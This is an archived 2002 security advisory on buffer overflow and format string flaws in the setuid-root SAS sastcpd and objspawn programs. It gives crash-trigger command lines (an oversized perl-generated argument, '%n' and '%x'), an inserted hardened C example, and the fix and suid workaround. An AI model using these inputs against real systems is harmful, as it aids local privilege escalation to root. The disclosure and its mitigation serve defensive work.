sas - sastcpd Buffer Overflow and Format String Vulnerabilities
30th Jan 2002 [SBWID-5047]



	SAS Job Spawner for Open Systems version 8.01


	From the Digital Shadow advisory [http://www.ministryofpeace.co.uk]:

	Since sastcpd is installed uid 0 by default, full root privileges can
	be obtained through exploitation of either of the vulnerabilities below.


	$ sastcpd `perl -e "print 'A' x 1200"`

	Invalid argument: AAAA[..cut..]AAAA.

	Segmentation fault (core dumped)

	$ ls -la core

	-rw-------  1 root    teknix     1454382 Jan  28 04:22 core


	$ sastcpd %n

	Segmentation fault (core dumped)


	$ sastcpd %x

	Invalid argument: 2.
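	The two outputs above point at one error path: the argument is copied into a fixed-size message buffer without a length check (the 1200-byte crash) and is then handed to a printf-style routine as the format string (the "%n" crash and the "%x" leak). The hardened form of that error reporter, as an added example that is not code from SAS or from the advisory (function name, length limit and message text are assumptions):

```c
#include <stdio.h>
#include <string.h>

/* Upper bound on an argument we are willing to echo back; longer input is
 * rejected instead of being copied into a fixed-size buffer (assumed limit). */
#define ARG_MAX_LEN 256

/* Hardened "Invalid argument" reporter. It avoids both defects shown above:
 *  - the argument is passed as DATA via "%.*s", never as the format string,
 *    so "%n" cannot write memory and "%x" cannot read stack words;
 *  - the message is built with snprintf against the caller's buffer size,
 *    so a 1200-byte argument cannot overflow anything.
 * Returns 0 on success, -1 if the argument is too long or the output would
 * be truncated (out is then an empty or truncated but NUL-terminated string). */
int report_invalid_argument(char *out, size_t outlen, const char *arg)
{
    size_t n = strlen(arg);
    int written;

    if (n > ARG_MAX_LEN) {
        if (outlen > 0)
            out[0] = '\0';
        return -1;
    }
    /* snprintf always NUL-terminates when outlen > 0; the precision caps
     * the copy at the measured length even if arg changes underneath us. */
    written = snprintf(out, outlen, "Invalid argument: %.*s.", (int)n, arg);
    if (written < 0 || (size_t)written >= outlen)
        return -1;
    return 0;
}

int main(int argc, char **argv)
{
    char msg[ARG_MAX_LEN + 32];   /* room for prefix, argument and trailer */

    if (argc < 2)
        return 0;
    if (report_invalid_argument(msg, sizeof msg, argv[1]) == 0)
        puts(msg);
    else
        puts("Invalid argument: (too long)");
    return 1;
}
```

Compiled and run as `./a.out %x`, the hardened version prints the literal text "Invalid argument: %x." instead of a stack word.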



	"Ellipse" added:

	It appears that the objspawn program included with  the  SAS/Integration
	Technologies product is also vulnerable to these bugs. objspawn is  also
	a setuid root executable  by  default.  See  the  above  link  for  more


	SAS Support say that these problems were fixed in version 8.2.



	Also, removing the suid bit seems to solve the problem without breaking
	the software.

